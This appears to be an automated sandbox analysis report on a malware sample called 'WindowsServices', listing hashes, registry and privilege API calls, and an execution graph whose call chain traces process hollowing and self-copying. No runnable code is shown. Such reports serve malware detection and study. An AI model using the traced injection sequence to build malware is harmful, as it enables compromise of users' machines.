                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        control_flow_graph 329 b3a392-b3a3cf 331 b3a3d1 329->331 332 b3a3d4-b3a3dd 329->332 331->332 333 b3a3e2-b3a3e8 332->333 334 b3a3df 332->334 335 b3a3ea 333->335 336 b3a3ed-b3a404 333->336 334->333 335->336 338 b3a406-b3a419 RegQueryValueExW 336->338 339 b3a43b-b3a440 336->339 340 b3a442-b3a447 338->340 341 b3a41b-b3a438 338->341 339->338 340->341
                                                                        APIs
                                                                        • RegQueryValueExW.KERNELBASE(?,00000E24,E324DF60,00000000,00000000,00000000,00000000), ref: 00B3A40C
                                                                        Memory Dump Source
                                                                        • Source File: 00000011.00000002.1750907724.0000000000B3A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B3A000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_17_2_b3a000_WindowsServices.jbxd
                                                                        Similarity
                                                                        • API ID: QueryValue
                                                                        • String ID:
                                                                        • API String ID: 3660427363-0
                                                                        • Opcode ID: d1bdea91269028d5a2ba384184e73ef120e9f15afd73edaf226ad40eb8e4cce6
                                                                        • Instruction ID: 275c34f616ccd0c2858801f606c73ebe0cd8de0f65ae1a0aa12d22e7342c0751
                                                                        • Opcode Fuzzy Hash: d1bdea91269028d5a2ba384184e73ef120e9f15afd73edaf226ad40eb8e4cce6
                                                                        • Instruction Fuzzy Hash: A9218EB66002049FE720CE15DD88FA6F7ECEF04710F24849AED858B751D364E809CA76
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        control_flow_graph 345 b3a960-b3a9c4 347 b3aa07-b3aa0c 345->347 348 b3a9c6-b3a9ce FindCloseChangeNotification 345->348 347->348 349 b3a9d4-b3a9e6 348->349 351 b3a9e8-b3aa04 349->351 352 b3aa0e-b3aa13 349->352 352->351
                                                                        APIs
                                                                        • FindCloseChangeNotification.KERNELBASE(?), ref: 00B3A9CC
                                                                        Memory Dump Source
                                                                        • Source File: 00000011.00000002.1750907724.0000000000B3A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B3A000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_17_2_b3a000_WindowsServices.jbxd
                                                                        Similarity
                                                                        • API ID: ChangeCloseFindNotification
                                                                        • String ID:
                                                                        • API String ID: 2591292051-0
                                                                        • Opcode ID: bd0c1dc9e1850f5167247ce492d57bdc120c69985ced56f62c3569fd139957fa
                                                                        • Instruction ID: fb4e30c7bc2e6b5ea3beccd2786ba61fea74128b3319901e7e8a5ad6eacdbbae
                                                                        • Opcode Fuzzy Hash: bd0c1dc9e1850f5167247ce492d57bdc120c69985ced56f62c3569fd139957fa
                                                                        • Instruction Fuzzy Hash: 4821DE725093C05FDB128B25DD54B92BFF4AF07324F0984DAEC848F6A3D234A908CB62
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        control_flow_graph 354 b3a486-b3a4c3 356 b3a4c5 354->356 357 b3a4c8-b3a4d4 354->357 356->357 358 b3a4d6 357->358 359 b3a4d9-b3a4f0 357->359 358->359 361 b3a4f2-b3a505 RegSetValueExW 359->361 362 b3a527-b3a52c 359->362 363 b3a507-b3a524 361->363 364 b3a52e-b3a533 361->364 362->361 364->363
                                                                        APIs
                                                                        • RegSetValueExW.KERNELBASE(?,00000E24,E324DF60,00000000,00000000,00000000,00000000), ref: 00B3A4F8
                                                                        Memory Dump Source
                                                                        • Source File: 00000011.00000002.1750907724.0000000000B3A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B3A000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_17_2_b3a000_WindowsServices.jbxd
                                                                        Similarity
                                                                        • API ID: Value
                                                                        • String ID:
                                                                        • API String ID: 3702945584-0
                                                                        • Opcode ID: 08c650319ae055d194644a1acd8c85fd6a83c0b262d6eb8ed86946a41e41a1d8
                                                                        • Instruction ID: 1d560bd33fcc50c2bb8477551b38da6d44795264f501b0c22c113bc248ba9c74
                                                                        • Opcode Fuzzy Hash: 08c650319ae055d194644a1acd8c85fd6a83c0b262d6eb8ed86946a41e41a1d8
                                                                        • Instruction Fuzzy Hash: B911B4B6500200AFE7218E11DD48F67BBECEF04710F24849AED458AB41D370E808CA72
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        control_flow_graph 376 b3a6ae-b3a6d5 377 b3a6d7 376->377 378 b3a6da-b3a6e0 376->378 377->378 379 b3a6e2 378->379 380 b3a6e5-b3a6ee 378->380 379->380 381 b3a731-b3a736 380->381 382 b3a6f0-b3a6f8 LookupPrivilegeValueW 380->382 381->382 383 b3a6fe-b3a710 382->383 385 b3a712-b3a72e 383->385 386 b3a738-b3a73d 383->386 386->385
                                                                        APIs
                                                                        • LookupPrivilegeValueW.ADVAPI32(?,?,?), ref: 00B3A6F6
                                                                        Memory Dump Source
                                                                        • Source File: 00000011.00000002.1750907724.0000000000B3A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B3A000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_17_2_b3a000_WindowsServices.jbxd
                                                                        Similarity
                                                                        • API ID: LookupPrivilegeValue
                                                                        • String ID:
                                                                        • API String ID: 3899507212-0
                                                                        • Opcode ID: e33192942bc49b3826f4d77447573ff625d6926e9768712d76e34fc902e3de6e
                                                                        • Instruction ID: efda4eb439218544a12e600b20afea91c1efd8da7eb1dd75d217fa0b8b0fcdb9
                                                                        • Opcode Fuzzy Hash: e33192942bc49b3826f4d77447573ff625d6926e9768712d76e34fc902e3de6e
                                                                        • Instruction Fuzzy Hash: FC1188756042408FDB20DF19DD89B56FBE8EF14720F28C4AADD45CB742D374E844DA62
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • FindCloseChangeNotification.KERNELBASE(?), ref: 00B3A634
                                                                        Memory Dump Source
                                                                        • Source File: 00000011.00000002.1750907724.0000000000B3A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B3A000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_17_2_b3a000_WindowsServices.jbxd
                                                                        Similarity
                                                                        • API ID: ChangeCloseFindNotification
                                                                        • String ID:
                                                                        • API String ID: 2591292051-0
                                                                        • Opcode ID: 7d0717e9a1d21da7c546166e20f5a2fe2f3e1e066c5083d607d6235f1c2136c2
                                                                        • Instruction ID: 1f7beef741e7adcd890cd875ac6205a76c73d2f7e60d984bafc295145d92c45e
                                                                        • Opcode Fuzzy Hash: 7d0717e9a1d21da7c546166e20f5a2fe2f3e1e066c5083d607d6235f1c2136c2
                                                                        • Instruction Fuzzy Hash: F211C2755093809FDB118F25DC85B52BFE8EF46720F0884EAED858F662D275A908CB61
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • FindCloseChangeNotification.KERNELBASE(?), ref: 00B3A9CC
                                                                        Memory Dump Source
                                                                        • Source File: 00000011.00000002.1750907724.0000000000B3A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B3A000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_17_2_b3a000_WindowsServices.jbxd
                                                                        Similarity
                                                                        • API ID: ChangeCloseFindNotification
                                                                        • String ID:
                                                                        • API String ID: 2591292051-0
                                                                        • Opcode ID: 93a49a5aa920d307d18dda73f7ba438d38c8a4f95b91eab2c13a3442f89c4341
                                                                        • Instruction ID: f5304a4202bfca17956e649a7fdbd32e0dcc416c1c22b6d24b39283816c63e97
                                                                        • Opcode Fuzzy Hash: 93a49a5aa920d307d18dda73f7ba438d38c8a4f95b91eab2c13a3442f89c4341
                                                                        • Instruction Fuzzy Hash: CB01D4766006408FDB10CF15D988752FBE4EF04324F28C4EADD498BB46D274E808CBA2
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • FindCloseChangeNotification.KERNELBASE(?), ref: 00B3A634
                                                                        Memory Dump Source
                                                                        • Source File: 00000011.00000002.1750907724.0000000000B3A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B3A000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_17_2_b3a000_WindowsServices.jbxd
                                                                        Similarity
                                                                        • API ID: ChangeCloseFindNotification
                                                                        • String ID:
                                                                        • API String ID: 2591292051-0
                                                                        • Opcode ID: 526cb0398bb204b5d39c8dc17ea1060213536807a72be7021004a7647af70512
                                                                        • Instruction ID: 9fe09d0e01c3293c63d8fb327490c41acaebb2927fc9104f0e14f9b663f3866d
                                                                        • Opcode Fuzzy Hash: 526cb0398bb204b5d39c8dc17ea1060213536807a72be7021004a7647af70512
                                                                        • Instruction Fuzzy Hash: A201D4756002009FDB108F15D989756FBD4EF04720F28C4EADD458BB56D275E808CE62
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 00000011.00000002.1777067238.0000000004D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D30000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_17_2_4d30000_WindowsServices.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 035ac2f6873335a9d197daa9291543687e382e8b5ce68cf4bd4882156ca1d91b
                                                                        • Instruction ID: f5d6c781924ceb68afedb2ddf131b6c3d5dd61b595cb1ec307277947a73edd5a
                                                                        • Opcode Fuzzy Hash: 035ac2f6873335a9d197daa9291543687e382e8b5ce68cf4bd4882156ca1d91b
                                                                        • Instruction Fuzzy Hash: 584150342162468FC704FB3AE78D98977F2AB8120C7848929D1044FF6EDF785A49CB91
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 00000011.00000002.1752933152.0000000000FC0000.00000040.00000020.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_17_2_fc0000_WindowsServices.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 28935b3345de2871a2acf0b57b58b44c8e55b501259cfbc487dfa26625d0b10e
                                                                        • Instruction ID: 90508d405424f90f5872f4de0dd2030d13cc65496bd68b39e76c97d67d2cd7e8
                                                                        • Opcode Fuzzy Hash: 28935b3345de2871a2acf0b57b58b44c8e55b501259cfbc487dfa26625d0b10e
                                                                        • Instruction Fuzzy Hash: 2901F7B65097805FCB12CF15DD40863FFB8EF8662070984AFEC498BA52D225B809CB76
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 00000011.00000002.1777067238.0000000004D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D30000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_17_2_4d30000_WindowsServices.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 4b873a65a1f20a80ac42096a310ce02b2d59c57dd96ea2979b6aa9b1cfeafec5
                                                                        • Instruction ID: fb90eba6a3454b7574945c471b966cb3bf013d4510794dfb8234557c8d984c72
                                                                        • Opcode Fuzzy Hash: 4b873a65a1f20a80ac42096a310ce02b2d59c57dd96ea2979b6aa9b1cfeafec5
                                                                        • Instruction Fuzzy Hash: 6701FA9A94F7C15FEB5343306CA55A57F70AD6721479F00EBD0D4CB5A3E5090A0AC762
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 00000011.00000002.1777067238.0000000004D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D30000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_17_2_4d30000_WindowsServices.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 44a64a7351c627bfef7b4cb8b1d26b7f429325e741f3f02dd15fbd8caf3105f7
                                                                        • Instruction ID: c0ac7e4fe1bc35595cf6bbddfc83b850c1b439ac59176ac6a927667c5003b9a6
                                                                        • Opcode Fuzzy Hash: 44a64a7351c627bfef7b4cb8b1d26b7f429325e741f3f02dd15fbd8caf3105f7
                                                                        • Instruction Fuzzy Hash: BDF028317003004BC315777DA8299BA376F9BC1659B44407ED6414B792CF799C4AC3F6
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 00000011.00000002.1752933152.0000000000FC0000.00000040.00000020.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_17_2_fc0000_WindowsServices.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 8022707999cc4b23dc4b845a326a9a71d65aba76dacd6f9b907666af82eb00af
                                                                        • Instruction ID: 34052619a636c29c8f9a483ce14c8c9bcfcbac5f9a5b8dbcc2c5bf10888c51ab
                                                                        • Opcode Fuzzy Hash: 8022707999cc4b23dc4b845a326a9a71d65aba76dacd6f9b907666af82eb00af
                                                                        • Instruction Fuzzy Hash: B9E092BA6046044B9650CF0AEC45452F7D8EB88630B18C07FDC0D8BB01E276B509CAA5
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 00000011.00000002.1750876710.0000000000B32000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B32000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_17_2_b32000_WindowsServices.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 7a1c62c1ecf58b0012a06aad5dd275011aea56c3dabf05da4c6417bb02e701d8
                                                                        • Instruction ID: fbc12a602faec10042c9f179f15a936a7e8b1d76831119c9e454bfb68733ad9a
                                                                        • Opcode Fuzzy Hash: 7a1c62c1ecf58b0012a06aad5dd275011aea56c3dabf05da4c6417bb02e701d8
                                                                        • Instruction Fuzzy Hash: 26D05E792056C14FD3169B1CD2A9F9537D4AB55714F5A44F9A8008B763C768E981D600
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 00000011.00000002.1750876710.0000000000B32000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B32000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_17_2_b32000_WindowsServices.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: ef5a5a1aba23ed778780014232c5cf34f2b9b5e1a462a0efbd6383665981d2ce
                                                                        • Instruction ID: c53372230f59a2cebec8b621451c7bd280ae1c937f97fce7045352bd629b65d6
                                                                        • Opcode Fuzzy Hash: ef5a5a1aba23ed778780014232c5cf34f2b9b5e1a462a0efbd6383665981d2ce
                                                                        • Instruction Fuzzy Hash: DCD05E352402814FCB15DB1CD2D8F5977D4AB44B14F1644E8AC108B762C7A8D8C4DA00
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Execution Graph

                                                                        Execution Coverage: 17.9%
                                                                        Dynamic/Decrypted Code Coverage: 0%
                                                                        Signature Coverage: 0%
                                                                        Total number of Nodes: 1160
                                                                        Total number of Limit Nodes: 13
                                                                        execution_graph 2340 40a280 2353 405a10 2340->2353 2342 40a2a7 2343 405a10 104 API calls 2342->2343 2344 40a2b0 SendMessageA SendMessageA GetWindowRect 2343->2344 2480 4052c0 CopyRect 2344->2480 2346 40a30b _ftol 2347 40afbe 2346->2347 2348 40a342 GetWindowRect 2347->2348 2349 40a359 2348->2349 2481 405300 CopyRect 2349->2481 2352 40a38c 2552 40b0e0 2353->2552 2356 407516 LoadLibraryA 2358 407568 LoadLibraryA 2356->2358 2360 407652 LoadLibraryA 2358->2360 2361 40766b LoadLibraryA 2360->2361 2362 407681 LoadLibraryA 2361->2362 2363 407694 LoadLibraryA 2362->2363 2364 4076a4 LoadLibraryA 2363->2364 2365 4076ba LoadLibraryA 2364->2365 2366 4076ca LoadLibraryA 2365->2366 2367 4076da LoadLibraryA 2366->2367 2368 4076ea LoadLibraryA 2367->2368 2370 4077b1 LoadLibraryA 2368->2370 2371 4077c1 LoadLibraryA 2370->2371 2372 4077d1 LoadLibraryA 2371->2372 2373 4077e7 LoadLibraryA 2372->2373 2374 4077fd LoadLibraryA 2373->2374 2375 407813 LoadLibraryA 2374->2375 2376 407829 LoadLibraryA 2375->2376 2377 40783f LoadLibraryA 2376->2377 2378 40784f LoadLibraryA 2377->2378 2379 407865 LoadLibraryA 2378->2379 2380 40787b LoadLibraryA 2379->2380 2382 407a48 2380->2382 2383 407ad3 GetModuleFileNameW 2382->2383 2385 408afd 2382->2385 2393 408e4b 2382->2393 2384 407b09 wcscpy 2383->2384 2404 407b25 wcscpy wcscat wcscpy wcscat wcscat 2383->2404 2384->2404 2387 408c26 CreateFileW 2385->2387 2388 408cf7 2385->2388 2435 408b16 2385->2435 2387->2393 2396 408c78 CreateFileW 2387->2396 2390 408d00 CreateToolhelp32Snapshot 2388->2390 2399 408e47 2388->2399 2392 408d9c Process32First 2390->2392 2390->2393 2391 408158 CreateProcessW 2395 40818d Wow64GetThreadContext NtReadVirtualMemory NtUnmapViewOfSection NtUnmapViewOfSection 2391->2395 2441 408225 2391->2441 2405 408de6 Process32Next 2392->2405 2406 408e2d FindCloseChangeNotification 2392->2406 2393->2342 2398 4081f7 NtUnmapViewOfSection NtUnmapViewOfSection 2395->2398 
2396->2393 2397 408c99 CreateFileW 2396->2397 2397->2393 2400 408cbc CreateFileW 2397->2400 2398->2441 2399->2393 2407 408f3a CreateFileA 2399->2407 2400->2393 2403 408cdd FindCloseChangeNotification 2400->2403 2402 408272 VirtualAllocEx 2402->2441 2411 408ce7 2403->2411 2404->2391 2405->2406 2408 408df7 strstr 2405->2408 2406->2342 2407->2393 2410 408fc7 CreateFileA 2407->2410 2412 408e3a 2408->2412 2413 408e0b strstr 2408->2413 2409 4082d8 VirtualAllocEx WriteProcessMemory WriteProcessMemory 2409->2441 2410->2393 2415 408fe9 CreateFileW 2410->2415 2411->2342 2412->2342 2413->2412 2416 408e1f 2413->2416 2414 4082b6 VirtualAllocEx 2414->2441 2424 40903b wcslen CreateFileW 2415->2424 2416->2406 2416->2408 2417 408327 WriteProcessMemory 2417->2417 2417->2441 2418 4083da WriteProcessMemory Wow64SetThreadContext GetPEB 2421 40844e WriteProcessMemory ResumeThread Wow64SuspendThread WriteProcessMemory 2418->2421 2418->2441 2420 40838c WriteProcessMemory 2420->2418 2420->2420 2421->2441 2422 4084c1 wcscpy wcscat MoveFileExW CopyFileW 2425 4087f8 ResumeThread 2422->2425 2422->2441 2423 4089af ResumeThread 2423->2441 2426 409077 wcscat CreateFileW 2424->2426 2425->2441 2431 409111 2426->2431 2432 40911a VirtualAlloc 2426->2432 2427 408a4d wcscat 2430 408a77 wcsstr 2427->2430 2429 408813 Sleep CreateToolhelp32Snapshot Module32First 2429->2441 2433 408a8f CreateFileW 2430->2433 2430->2441 2431->2432 2436 409148 ReadFile 2432->2436 2433->2441 2434 408900 Wow64SuspendThread 2434->2441 2435->2342 2445 40915c FindCloseChangeNotification 2436->2445 2437 4088c8 strstr 2437->2441 2442 40891b Wow64SuspendThread FindCloseChangeNotification DeleteFileW 2437->2442 2438 408945 ResumeThread Sleep DeleteFileW 2440 408977 Wow64SuspendThread 2438->2440 2438->2441 2439 408ad8 TerminateProcess 2439->2441 2444 408988 Sleep MoveFileExW 2440->2444 2441->2385 2441->2391 2441->2402 2441->2409 2441->2414 2441->2417 2441->2418 2441->2420 2441->2422 2441->2423 2441->2425 2441->2427 2441->2429 
2441->2434 2441->2437 2441->2438 2441->2439 2441->2444 2442->2441 2444->2423 2444->2441 2447 4091c3 VirtualAlloc 2445->2447 2449 4092a3 2447->2449 2448 409b8a 2450 405a10 ExitProcess 2448->2450 2449->2448 2451 409409 2449->2451 2454 405a10 ExitProcess 2449->2454 2452 409bd6 2450->2452 2455 409428 2451->2455 2460 405a10 ExitProcess 2451->2460 2453 409be6 2452->2453 2456 405a10 ExitProcess 2452->2456 2457 409c07 2453->2457 2458 409c1e 2453->2458 2459 4093fd 2454->2459 2466 405a10 ExitProcess 2455->2466 2478 40949e 2455->2478 2456->2453 2461 405a10 ExitProcess 2457->2461 2463 409c27 2458->2463 2464 409c3e 2458->2464 2459->2451 2462 409404 2459->2462 2465 40941c 2460->2465 2470 409c12 2461->2470 2554 405a00 ExitProcess 2462->2554 2472 405a10 ExitProcess 2463->2472 2468 405a10 ExitProcess 2464->2468 2465->2455 2467 409423 2465->2467 2469 40945b 2466->2469 2555 405a00 ExitProcess 2467->2555 2468->2393 2476 405a10 ExitProcess 2469->2476 2469->2478 2470->2342 2473 409c32 2472->2473 2473->2342 2475 409a05 2475->2448 2477 405a10 ExitProcess 2475->2477 2476->2478 2477->2448 2478->2475 2479 40996b CreateProcessA Sleep TerminateProcess 2478->2479 2479->2475 2480->2346 2556 403e10 2481->2556 2483 405331 CopyRect 2484 403e10 7 API calls 2483->2484 2485 405351 CopyRect 2484->2485 2486 403e10 7 API calls 2485->2486 2487 405371 CopyRect 2486->2487 2488 403e10 7 API calls 2487->2488 2489 405391 CopyRect 2488->2489 2490 403e10 7 API calls 2489->2490 2491 4053b1 CopyRect 2490->2491 2492 403e10 7 API calls 2491->2492 2493 4053d1 CopyRect 2492->2493 2494 403e10 7 API calls 2493->2494 2495 4053f1 CopyRect 2494->2495 2496 403e10 7 API calls 2495->2496 2497 405411 CopyRect 2496->2497 2498 403e10 7 API calls 2497->2498 2499 405431 CopyRect 2498->2499 2500 403e10 7 API calls 2499->2500 2501 405451 CopyRect 2500->2501 2502 403e10 7 API calls 2501->2502 2503 405471 CopyRect 2502->2503 2504 403e10 7 API calls 2503->2504 2505 405491 CopyRect 2504->2505 2506 403e10 7 API calls 2505->2506 2507 
4054b1 CopyRect 2506->2507 2508 403e10 7 API calls 2507->2508 2509 4054d1 CopyRect 2508->2509 2510 403e10 7 API calls 2509->2510 2511 4054f1 CopyRect 2510->2511 2512 403e10 7 API calls 2511->2512 2513 405511 CopyRect 2512->2513 2514 403e10 7 API calls 2513->2514 2515 405531 CopyRect 2514->2515 2516 403e10 7 API calls 2515->2516 2517 405551 CopyRect 2516->2517 2518 403e10 7 API calls 2517->2518 2519 405571 CopyRect 2518->2519 2520 403e10 7 API calls 2519->2520 2521 405591 CopyRect 2520->2521 2522 403e10 7 API calls 2521->2522 2523 4055b1 CopyRect 2522->2523 2524 403e10 7 API calls 2523->2524 2525 4055d1 CopyRect 2524->2525 2526 403e10 7 API calls 2525->2526 2527 4055f1 CopyRect 2526->2527 2528 403e10 7 API calls 2527->2528 2529 405611 CopyRect 2528->2529 2530 403e10 7 API calls 2529->2530 2531 405631 CopyRect 2530->2531 2532 403e10 7 API calls 2531->2532 2533 405651 CopyRect 2532->2533 2534 403e10 7 API calls 2533->2534 2535 405671 CopyRect 2534->2535 2536 403e10 7 API calls 2535->2536 2537 405691 CopyRect 2536->2537 2538 403e10 7 API calls 2537->2538 2539 4056b1 CopyRect 2538->2539 2540 403e10 7 API calls 2539->2540 2541 4056d1 CopyRect 2540->2541 2542 403e10 7 API calls 2541->2542 2543 4056f1 CopyRect 2542->2543 2544 403e10 7 API calls 2543->2544 2545 405711 CopyRect 2544->2545 2546 403e10 7 API calls 2545->2546 2547 405731 CopyRect 2546->2547 2548 403e10 7 API calls 2547->2548 2549 405751 CopyRect 2548->2549 2550 403e10 7 API calls 2549->2550 2551 405771 SetWindowRgn 2550->2551 2551->2352 2553 405a1d LoadLibraryA GetProcAddress LoadLibraryA GetProcAddress 2552->2553 2553->2356 2560 403e3a 2556->2560 2557 403fcd 2558 40404a CreatePolygonRgn 2557->2558 2559 403fdf CreatePolygonRgn 2557->2559 2566 404058 2558->2566 2561 403fef 2559->2561 2560->2557 2562 403f74 _ftol _ftol 2560->2562 2563 403ffa CombineRgn CreatePolygonRgn 2561->2563 2562->2557 2562->2562 2564 40ae02 2563->2564 2565 40401e CombineRgn 2564->2565 2565->2566 2566->2483 2956 40aac0 GetClientRect 2960 
404ec0 CopyRect 2956->2960 2958 40ab29 LoadCursorA SetCursor 2959 40aae6 2959->2958 3039 403c20 2960->3039 2962 404ef1 2963 404f06 CopyRect 2962->2963 2964 404ef8 2962->2964 2965 403c20 4 API calls 2963->2965 2964->2959 2966 404f23 2965->2966 2967 404f38 CopyRect 2966->2967 2968 404f2a 2966->2968 2969 403c20 4 API calls 2967->2969 2968->2959 2970 404f55 2969->2970 2971 404f6a CopyRect 2970->2971 2972 404f5c 2970->2972 2973 403c20 4 API calls 2971->2973 2972->2959 2974 404f87 2973->2974 2975 404f9c CopyRect 2974->2975 2976 404f8e 2974->2976 2977 403c20 4 API calls 2975->2977 2976->2959 2978 404fb9 2977->2978 2979 404fc0 2978->2979 2980 404fce CopyRect 2978->2980 2979->2959 2981 403c20 4 API calls 2980->2981 2982 404feb 2981->2982 2983 405000 CopyRect 2982->2983 2984 404ff2 2982->2984 2985 403c20 4 API calls 2983->2985 2984->2959 2986 40501d 2985->2986 2987 405032 CopyRect 2986->2987 2988 405024 2986->2988 2989 403c20 4 API calls 2987->2989 2988->2959 2990 40504f 2989->2990 2991 405064 CopyRect 2990->2991 2992 405056 2990->2992 2993 403c20 4 API calls 2991->2993 2992->2959 2994 405081 2993->2994 2995 405096 CopyRect 2994->2995 2996 405088 2994->2996 2997 403c20 4 API calls 2995->2997 2996->2959 2998 4050b3 2997->2998 2999 4050c8 CopyRect 2998->2999 3000 4050ba 2998->3000 3001 403c20 4 API calls 2999->3001 3000->2959 3002 4050e5 3001->3002 3003 4050fa CopyRect 3002->3003 3004 4050ec 3002->3004 3005 403c20 4 API calls 3003->3005 3004->2959 3006 405117 3005->3006 3007 40512c CopyRect 3006->3007 3008 40511e 3006->3008 3009 403c20 4 API calls 3007->3009 3008->2959 3010 405149 3009->3010 3011 405150 3010->3011 3012 40515e CopyRect 3010->3012 3011->2959 3013 403c20 4 API calls 3012->3013 3014 40517b 3013->3014 3015 405190 CopyRect 3014->3015 3016 405182 3014->3016 3017 403c20 4 API calls 3015->3017 3016->2959 3018 4051ad 3017->3018 3019 4051c2 CopyRect 3018->3019 3020 4051b4 3018->3020 3021 403c20 4 API calls 3019->3021 3020->2959 3022 4051df 3021->3022 3023 4051f4 CopyRect 
3022->3023 3024 4051e6 3022->3024 3025 403c20 4 API calls 3023->3025 3024->2959 3026 405211 3025->3026 3027 405226 CopyRect 3026->3027 3028 405218 3026->3028 3029 403c20 4 API calls 3027->3029 3028->2959 3030 405243 3029->3030 3031 405258 CopyRect 3030->3031 3032 40524a 3030->3032 3033 403c20 4 API calls 3031->3033 3032->2959 3034 405275 3033->3034 3035 40528a CopyRect 3034->3035 3036 40527c 3034->3036 3037 403c20 4 API calls 3035->3037 3036->2959 3038 4052a7 3037->3038 3038->2959 3042 403d04 3039->3042 3040 403d94 CreatePolygonRgn 3041 403dad 3040->3041 3043 403db1 PtInRegion 3041->3043 3046 403dca 3041->3046 3042->3040 3044 403d37 _ftol _ftol 3042->3044 3043->3046 3044->3044 3045 403d90 3044->3045 3045->3040 3046->2962 3055 40ac80 ExtTextOutA 3056 409c80 3065 401000 CopyRect 3056->3065 3058 409cf3 _ftol _ftol _ftol 3059 40afbe 3058->3059 3060 409d7d GetWindowRect 3059->3060 3061 409d98 3060->3061 3066 402500 CopyRect 3061->3066 3064 409dd5 3065->3058 3067 403e10 7 API calls 3066->3067 3068 402531 CopyRect 3067->3068 3397 404850 3068->3397 3070 402551 CopyRect 3071 403e10 7 API calls 3070->3071 3072 402571 CopyRect 3071->3072 3398 404850 3072->3398 3074 402591 CopyRect 3075 403e10 7 API calls 3074->3075 3076 4025b1 CopyRect 3075->3076 3399 404850 3076->3399 3078 4025d1 CopyRect 3079 403e10 7 API calls 3078->3079 3080 4025f1 CopyRect 3079->3080 3400 404850 3080->3400 3082 402611 CopyRect 3083 403e10 7 API calls 3082->3083 3084 402631 CopyRect 3083->3084 3401 404850 3084->3401 3086 402651 CopyRect 3087 403e10 7 API calls 3086->3087 3088 402671 CopyRect 3087->3088 3402 404850 3088->3402 3090 402691 CopyRect 3091 403e10 7 API calls 3090->3091 3092 4026b1 CopyRect 3091->3092 3403 404850 3092->3403 3094 4026d1 CopyRect 3095 403e10 7 API calls 3094->3095 3096 4026f1 CopyRect 3095->3096 3404 404850 3096->3404 3098 402711 CopyRect 3099 403e10 7 API calls 3098->3099 3100 402731 CopyRect 3099->3100 3405 404850 3100->3405 3102 402751 CopyRect 3103 403e10 7 API calls 
